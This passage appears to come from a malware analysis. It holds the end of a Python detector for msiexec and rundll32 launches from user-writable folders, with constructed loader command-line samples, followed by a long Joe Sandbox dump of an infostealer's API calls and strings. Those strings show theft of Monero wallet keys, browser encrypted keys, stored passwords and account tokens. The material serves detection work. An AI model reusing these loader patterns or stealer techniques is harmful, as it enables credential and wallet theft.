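        m = MSI_RX.search(ev.cmdline)
        if not m or "/passive" not in ev.cmdline.lower():
            return None
        payload = m.group(1) or m.group(2)
    elif exe == "rundll32.exe":
        m = DLL_RX.search(ev.cmdline)
        if not m:
            return None
        payload = m.group(1) or m.group(2)
    else:
        return None
    if not USER_WRITABLE.search(payload):
        return None
    reason = f"{exe} launched {payload} from a user-writable directory"
    if USER_WRITABLE.search(ev.parent_image):
        reason += f"; parent {basename(ev.parent_image)} also runs from one"
    return reason

def scan(events):
    """Return [(pid, reason)] for every event that matches."""
    out = []
    for ev in events:
        reason = loader_verdict(ev)
        if reason:
            out.append((ev.pid, reason))
    return out

# Constructed sample events: two mimic the sample's ShellExecuteEx calls,
# two are ordinary installer/Control Panel launches that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(5120, r"C:\Windows\system32\msiexec.exe",
              r'C:\Windows\system32\msiexec.exe /i "C:\Users\u\AppData\Local\Temp\upd.msi" /passive',
              r"C:\Users\u\AppData\Local\Temp\file.exe"),
    ProcEvent(5188, r"C:\Windows\system32\rundll32.exe",
              r"C:\Windows\system32\rundll32.exe C:\ProgramData\abc\mod.dll,Run",
              r"C:\Users\u\AppData\Local\Temp\file.exe"),
    ProcEvent(6010, r"C:\Windows\system32\msiexec.exe",
              r'C:\Windows\system32\msiexec.exe /i "C:\Program Files\Vendor\setup.msi"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(6044, r"C:\Windows\system32\rundll32.exe",
              r"C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_EVENTS):
        print(pid, reason)
```

The `/passive` switch is what makes the msiexec branch specific: it shows only a progress bar and no prompts, which is what a loader wants and what interactive installs rarely use. Feed real Sysmon Event ID 1 or EDR process-start records into `ProcEvent` to use it outside this sample.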
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C6280: InternetOpenA.WININET(005E0DFE,00000001,00000000,00000000,00000000), ref: 005C62E1
                          • Part of subcall function 005C6280: StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6303
                          • Part of subcall function 005C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C6335
                          • Part of subcall function 005C6280: HttpOpenRequestA.WININET(00000000,GET,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C6385
                          • Part of subcall function 005C6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005C63BF
                          • Part of subcall function 005C6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005C63D1
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 005D5318
                        • lstrlen.KERNEL32(00000000), ref: 005D532F
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 005D5364
                        • lstrlen.KERNEL32(00000000), ref: 005D5383
                        • lstrlen.KERNEL32(00000000), ref: 005D53AE
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 96c36ae01d0efaeae5a1fe293ce8141e862bc628661de0458040006178366cea
                        • Instruction ID: b1c079da475611d66b9bd1d0a068fcadb480168c7b0de69f6ccacfe662958ebf
                        • Opcode Fuzzy Hash: 96c36ae01d0efaeae5a1fe293ce8141e862bc628661de0458040006178366cea
                        • Instruction Fuzzy Hash: BC51F13091014A9BCB28FF68DD9AEEE7B79BF90300F50401BF80656692EF346B45DB56
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 1faad96b10de5add7fbfc2b4690a9ee67bc0de9c00b0e76e76f91e2e8ae52417
                        • Instruction ID: 4f4c219b3c9e9bcf693b31064c0578ac200cc1d6c6301e941a47ff6f27f88431
                        • Opcode Fuzzy Hash: 1faad96b10de5add7fbfc2b4690a9ee67bc0de9c00b0e76e76f91e2e8ae52417
                        • Instruction Fuzzy Hash: B6C1A9B59002199BCB24EF64DC8DFEA7B79BB94304F00459BF50A67341EB70AA85CF91
                        APIs
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D42EC
                        • lstrcat.KERNEL32(?,014B0468), ref: 005D430B
                        • lstrcat.KERNEL32(?,?), ref: 005D431F
                        • lstrcat.KERNEL32(?,014AEE60), ref: 005D4333
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005D8D90: GetFileAttributesA.KERNEL32(00000000,?,005C1B54,?,?,005E564C,?,?,005E0E1F), ref: 005D8D9F
                          • Part of subcall function 005C9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005C9D39
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D93C0: GlobalAlloc.KERNEL32(00000000,005D43DD,005D43DD), ref: 005D93D3
                        • StrStrA.SHLWAPI(?,014B05E8), ref: 005D43F3
                        • GlobalFree.KERNEL32(?), ref: 005D4512
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9AEF
                          • Part of subcall function 005C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005C4EEE,00000000,?), ref: 005C9B01
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9B2A
                          • Part of subcall function 005C9AC0: LocalFree.KERNEL32(?,?,?,?,005C4EEE,00000000,?), ref: 005C9B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 005D44A3
                        • StrCmpCA.SHLWAPI(?,005E08D1), ref: 005D44C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005D44D2
                        • lstrcat.KERNEL32(00000000,?), ref: 005D44E5
                        • lstrcat.KERNEL32(00000000,005E0FB8), ref: 005D44F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: f2be9bef41cfbab8dfb2b174410d218deb0a6f3545ff69279de70756d0a05bdb
                        • Instruction ID: 398ca6b4a2da3ab121a538974ef873aa6d984f11ac97f15d825d73eef41bd380
                        • Opcode Fuzzy Hash: f2be9bef41cfbab8dfb2b174410d218deb0a6f3545ff69279de70756d0a05bdb
                        • Instruction Fuzzy Hash: 73715976900209ABCB24FBE4DC99FEE7779BB88300F048599F50597181EA74DB45CF91
                        APIs
                          • Part of subcall function 005C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005C12B4
                          • Part of subcall function 005C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 005C12BB
                          • Part of subcall function 005C12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005C12D7
                          • Part of subcall function 005C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005C12F5
                          • Part of subcall function 005C12A0: RegCloseKey.ADVAPI32(?), ref: 005C12FF
                        • lstrcat.KERNEL32(?,00000000), ref: 005C134F
                        • lstrlen.KERNEL32(?), ref: 005C135C
                        • lstrcat.KERNEL32(?,.keys), ref: 005C1377
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 005C1465
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 005C14EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 704df6cb4cc3a8e0ef77065a4289ffc57db24aa58f3fbf69a79b1f7cb1ac8002
                        • Instruction ID: 3344e413ebfab957d9d9b610c9c4af861c3951e155cab66f3c07980a21643577
                        • Opcode Fuzzy Hash: 704df6cb4cc3a8e0ef77065a4289ffc57db24aa58f3fbf69a79b1f7cb1ac8002
                        • Instruction Fuzzy Hash: 245168B1D5011A5BCB29FB64DC96FEE773CBF94300F40419AB60A62182EE705B85CF96
                        APIs
                          • Part of subcall function 005C72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005C733A
                          • Part of subcall function 005C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005C73B1
                          • Part of subcall function 005C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005C740D
                          • Part of subcall function 005C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 005C7452
                          • Part of subcall function 005C72D0: HeapFree.KERNEL32(00000000), ref: 005C7459
                        • lstrcat.KERNEL32(00000000,005E17FC), ref: 005C7606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005C7648
                        • lstrcat.KERNEL32(00000000, : ), ref: 005C765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005C768F
                        • lstrcat.KERNEL32(00000000,005E1804), ref: 005C76A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005C76D3
                        • lstrcat.KERNEL32(00000000,005E1808), ref: 005C76ED
                        • task.LIBCPMTD ref: 005C76FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: fcfc04ad5af4750e72697f43cd7f90470cbd0e7ec49665670af5ba0c646f4ebf
                        • Instruction ID: e0692ceb8baf07dc07af705098f80834455e90eb577a0491554681a672c3cb15
                        • Opcode Fuzzy Hash: fcfc04ad5af4750e72697f43cd7f90470cbd0e7ec49665670af5ba0c646f4ebf
                        • Instruction Fuzzy Hash: 70312D75A0020ADFCB48EBF4DC99EFE7B79FB98301B144118E112A72A0DA34E946CB51
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,014B0210,00000000,?,005E0E2C,00000000,?,00000000), ref: 005D8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 005D8158
                        • __aulldiv.LIBCMT ref: 005D8172
                        • __aulldiv.LIBCMT ref: 005D8180
                        • wsprintfA.USER32 ref: 005D81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: e44cb97c0e727e0b170e5c4439766db8a64c7d6a00ca21e7ed56060541ce86a6
                        • Instruction ID: 94aa8f386ca70ade9d9a92458e975ffec6823c8f2565f8e8b0bf44b4f611fde5
                        • Opcode Fuzzy Hash: e44cb97c0e727e0b170e5c4439766db8a64c7d6a00ca21e7ed56060541ce86a6
                        • Instruction Fuzzy Hash: CA213EB1E44318ABDB14DFD8CC49FAEBB78FB44B00F10461AF615BB280C77859018BA5
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                        • InternetOpenA.WININET(005E0DF7,00000001,00000000,00000000,00000000), ref: 005C610F
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C6147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 005C618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005C61B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 005C61DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005C620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 005C6249
                        • InternetCloseHandle.WININET(?), ref: 005C6253
                        • InternetCloseHandle.WININET(00000000), ref: 005C6260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: f20b1617da5a1a9c8335edfe46f8db9fddcc4689cbade0d0e66c7bb7b1baa46a
                        • Instruction ID: bc8e03ce1335afe1df1dac2262ac110d5126d35a0c8cbbbd8ab4f11034f1981d
                        • Opcode Fuzzy Hash: f20b1617da5a1a9c8335edfe46f8db9fddcc4689cbade0d0e66c7bb7b1baa46a
                        • Instruction Fuzzy Hash: A6514EB1900218AFDB24DF90DC49FEE7BB8FB44701F108099A605A72C1DB746B85CF95
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005C733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005C73B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005C740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005C7452
                        • HeapFree.KERNEL32(00000000), ref: 005C7459
                        • task.LIBCPMTD ref: 005C7555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: 53a2ce71ccfe7732ec3d48c5c0eb45858abdd0ed5634dc42af7c7481850ee330
                        • Instruction ID: 4f8034af8439c498a606e5236db01cc10ad42cc1e3bb28123f8b6bbca854008e
                        • Opcode Fuzzy Hash: 53a2ce71ccfe7732ec3d48c5c0eb45858abdd0ed5634dc42af7c7481850ee330
                        • Instruction Fuzzy Hash: BB61FDB590425D9FDB24DB90CC95FEABBB8BF48300F0081E9E689A6541DB705BC9CF91
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        • lstrlen.KERNEL32(00000000), ref: 005CBC9F
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 005CBCCD
                        • lstrlen.KERNEL32(00000000), ref: 005CBDA5
                        • lstrlen.KERNEL32(00000000), ref: 005CBDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: bca8268236ed0248008b32b07abb4a902383e9857066c9564a287a75b5036f18
                        • Instruction ID: 97fb01a4c925a80f1c32b1d25c8bfe4ca3b415cd0a76343920596a76de759c39
                        • Opcode Fuzzy Hash: bca8268236ed0248008b32b07abb4a902383e9857066c9564a287a75b5036f18
                        • Instruction Fuzzy Hash: 34B153719101499BDF28EBA4CC9AEEF7B3CBF94300F40455BF50662291EF346A49CB66
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: b4ec31eb3121d5034e46a13dbc53388275780eb3303453ee86ac80e52d02c422
                        • Instruction ID: af776899914b3e909e1dfab3be41d38df50a1e6cdb54a872f836b4ca2709c3a8
                        • Opcode Fuzzy Hash: b4ec31eb3121d5034e46a13dbc53388275780eb3303453ee86ac80e52d02c422
                        • Instruction Fuzzy Hash: 53F05E3090430DEFD3A89FE0E90976C7B70FB04703F04819AE64986391D6704B429B96
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005C4FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C4FD1
                        • InternetOpenA.WININET(005E0DDF,00000000,00000000,00000000,00000000), ref: 005C4FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 005C5011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 005C5041
                        • InternetCloseHandle.WININET(?), ref: 005C50B9
                        • InternetCloseHandle.WININET(?), ref: 005C50C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 27d74d8ed553d39c2820a4f2c2c5d741791c7d733a3a530d131055bbfe80ffd5
                        • Instruction ID: c47a1d5912372211c520f9dd31e7701f03f645d3f02bd74b35c602491461fef6
                        • Opcode Fuzzy Hash: 27d74d8ed553d39c2820a4f2c2c5d741791c7d733a3a530d131055bbfe80ffd5
                        • Instruction Fuzzy Hash: F2310AB4A00218ABDB24CF94DC89BDDB7B4FB48704F5081D9EA09B7281D7706AC58F99
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005D8426
                        • wsprintfA.USER32 ref: 005D8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005D847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D8499
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,014B0078,00000000,000F003F,?,00000400), ref: 005D84EC
                        • lstrlen.KERNEL32(?), ref: 005D8501
                        • RegQueryValueExA.ADVAPI32(00000000,014B0288,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,005E0B34), ref: 005D8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
